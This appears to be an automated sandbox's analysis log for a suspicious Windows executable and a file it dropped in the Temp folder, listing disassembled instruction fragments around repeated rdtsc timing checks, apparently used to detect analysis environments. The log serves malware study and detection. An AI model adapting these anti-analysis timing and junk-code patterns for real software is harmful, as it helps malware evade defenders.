Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 51600D7 second address: 51600DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160171 second address: 51601B1 instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 leave 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007FAAF9128037h 0x00000011 or al, FFFFFFAEh 0x00000014 jmp 00007FAAF9128039h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160B77 second address: 5160B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160B86 second address: 5160B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF9128034h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160B9E second address: 5160C22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAAF8FC508Fh 0x00000013 add esi, 1302641Eh 0x00000019 jmp 00007FAAF8FC5099h 0x0000001e popfd 0x0000001f pushad 0x00000020 mov edi, esi 0x00000022 pushfd 0x00000023 jmp 00007FAAF8FC508Ah 0x00000028 add esi, 608E6A18h 0x0000002e jmp 00007FAAF8FC508Bh 0x00000033 popfd 0x00000034 popad 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 jmp 00007FAAF8FC5096h 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160C22 second address: 5160C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160C26 second address: 5160C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160C2A second address: 5160C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160C30 second address: 5160C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160C36 second address: 5160C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160C3A second address: 5160C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [769B459Ch], 05h 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushfd 0x00000015 jmp 00007FAAF8FC508Dh 0x0000001a and ah, FFFFFFC6h 0x0000001d jmp 00007FAAF8FC5091h 0x00000022 popfd 0x00000023 pop esi 0x00000024 popad 0x00000025 je 00007FAB6A7B2E09h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160C87 second address: 5160CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAF9128035h 0x0000000a sub eax, 25BEAFD6h 0x00000010 jmp 00007FAAF9128031h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160CBA second address: 5160CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160CC0 second address: 5160CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160D25 second address: 5160D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5160D29 second address: 5160D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170AEE second address: 5170B49 instructions: 0x00000000 rdtsc 0x00000002 call 00007FAAF8FC508Eh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FAAF8FC508Eh 0x00000011 mov dword ptr [esp], ebp 0x00000014 jmp 00007FAAF8FC5090h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FAAF8FC508Ch 0x00000023 add esi, 511F1A48h 0x00000029 jmp 00007FAAF8FC508Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170B49 second address: 5170B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov esi, 7AA96FD5h 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c jmp 00007FAAF9128030h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170B6B second address: 5170B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FAAF8FC508Ah 0x0000000a sub ax, 3FD8h 0x0000000f jmp 00007FAAF8FC508Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170B8C second address: 5170B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170B92 second address: 5170B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170B96 second address: 5170BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 mov di, ax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170BB2 second address: 5170BB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170BB8 second address: 5170BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170BBC second address: 5170C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FAAF8FC5096h 0x00000013 test esi, esi 0x00000015 pushad 0x00000016 call 00007FAAF8FC508Eh 0x0000001b pop ecx 0x0000001c mov eax, edi 0x0000001e popad 0x0000001f je 00007FAB6A7A2842h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 pop edi 0x0000002a mov ecx, 340F8E7Dh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170C0C second address: 5170C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAF9128039h 0x00000009 xor esi, 6BC1D646h 0x0000000f jmp 00007FAAF9128031h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a cmp dword ptr [769B459Ch], 05h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov dx, AFDAh 0x00000028 mov eax, ebx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170C57 second address: 5170CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FAB6A7BA8B6h 0x0000000f pushad 0x00000010 mov al, F2h 0x00000012 pushfd 0x00000013 jmp 00007FAAF8FC5093h 0x00000018 xor al, FFFFFFDEh 0x0000001b jmp 00007FAAF8FC5099h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007FAAF8FC5093h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170CBC second address: 5170CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170CC1 second address: 5170D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007FAAF8FC508Eh 0x0000000b add ah, 00000038h 0x0000000e jmp 00007FAAF8FC508Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FAAF8FC5099h 0x0000001d xchg eax, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170D08 second address: 5170D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170D0C second address: 5170D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170D42 second address: 5170D76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAAF9128031h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, 3FCEh 0x00000017 mov di, 8ADAh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170DB1 second address: 5170DCA instructions: 0x00000000 rdtsc 0x00000002 mov si, 7BBFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov di, cx 0x0000000c mov ax, D28Dh 0x00000010 popad 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170DCA second address: 5170DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170DCE second address: 5170DD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 5170DD4 second address: 5170E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAF912802Ah 0x00000008 pop eax 0x00000009 call 00007FAAF912802Bh 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAAF9128032h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D5A9E second address: 5D5AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5CEBAC second address: 5CEBB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5CEBB0 second address: 5CEBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FAAF8FC5093h 0x0000000c jmp 00007FAAF8FC508Bh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5CEBC9 second address: 5CEBD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAAF9128026h 0x0000000a jo 00007FAAF9128026h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5CEBD9 second address: 5CEBDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D4C44 second address: 5D4C9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAF9128035h 0x00000008 jnp 00007FAAF9128026h 0x0000000e jmp 00007FAAF9128030h 0x00000013 popad 0x00000014 push esi 0x00000015 jmp 00007FAAF912802Dh 0x0000001a jmp 00007FAAF9128035h 0x0000001f pop esi 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D4C9E second address: 5D4CAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FAAF8FC5086h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D4CAE second address: 5D4CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D4CB2 second address: 5D4CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D4DD8 second address: 5D4DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FAAF912802Dh 0x0000000e jnp 00007FAAF9128032h 0x00000014 jnc 00007FAAF9128026h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D4DFC second address: 5D4E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FAAF8FC5098h 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D8665 second address: 5D8669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D8758 second address: 5D87C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FAAF8FC5098h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FAAF8FC508Bh 0x00000018 pop eax 0x00000019 push eax 0x0000001a stc 0x0000001b pop ecx 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FAAF8FC5088h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a cmc 0x0000003b push 00000003h 0x0000003d xor dword ptr [ebp+122D3657h], ecx 0x00000043 push E10E4E93h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D87C4 second address: 5D87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D87C8 second address: 5D87CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D88D0 second address: 5D88DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D88DA second address: 5D8901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAF8FC5099h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D8AEB second address: 5D8AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D8AF1 second address: 5D8AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D8AF5 second address: 5D8BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 73C8A43Eh 0x0000000f mov edx, dword ptr [ebp+122D2CCEh] 0x00000015 push 00000003h 0x00000017 mov esi, dword ptr [ebp+122D1E10h] 0x0000001d push 00000000h 0x0000001f jmp 00007FAAF9128038h 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FAAF9128028h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 mov edi, ecx 0x00000042 mov cx, 7F1Ah 0x00000046 sub esi, 37697B7Fh 0x0000004c push EE62F643h 0x00000051 pushad 0x00000052 pushad 0x00000053 push esi 0x00000054 pop esi 0x00000055 jc 00007FAAF9128026h 0x0000005b popad 0x0000005c jne 00007FAAF9128028h 0x00000062 popad 0x00000063 xor dword ptr [esp], 2E62F643h 0x0000006a jmp 00007FAAF9128037h 0x0000006f lea ebx, dword ptr [ebp+1244E59Ch] 0x00000075 mov edi, dword ptr [ebp+122D2CD2h] 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f pushad 0x00000080 popad 0x00000081 jmp 00007FAAF9128038h 0x00000086 popad 0x00000087 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5D8BBD second address: 5D8BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC5093h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5E9FF5 second address: 5EA00E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5EA00E second address: 5EA018 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAF8FC508Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5EA018 second address: 5EA02E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAAF912802Dh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F6C8D second address: 5F6CA1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAF8FC5088h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnl 00007FAAF8FC5086h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7079 second address: 5F7098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF9128035h 0x00000009 jo 00007FAAF9128026h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7098 second address: 5F709C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F75ED second address: 5F75FF instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAF9128028h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F772E second address: 5F7734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7734 second address: 5F7752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAAF9128037h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7752 second address: 5F77AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FAAF8FC5099h 0x00000011 jmp 00007FAAF8FC5098h 0x00000016 jmp 00007FAAF8FC5096h 0x0000001b popad 0x0000001c jg 00007FAAF8FC5088h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F78EB second address: 5F791E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FAAF9128038h 0x0000000c pop esi 0x0000000d pushad 0x0000000e jo 00007FAAF9128028h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007FAAF9128026h 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7A7D second address: 5F7ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAAF8FC508Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 jl 00007FAAF8FC50CDh 0x00000017 pushad 0x00000018 jmp 00007FAAF8FC508Ch 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f jmp 00007FAAF8FC508Eh 0x00000024 jmp 00007FAAF8FC508Fh 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e jc 00007FAAF8FC5086h 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7ACB second address: 5F7AD5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAF9128026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe RDTSC instruction interceptor: First address: 5F7DCE second address: 5F7DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF8FC5092h 0x00000009 rdtsc
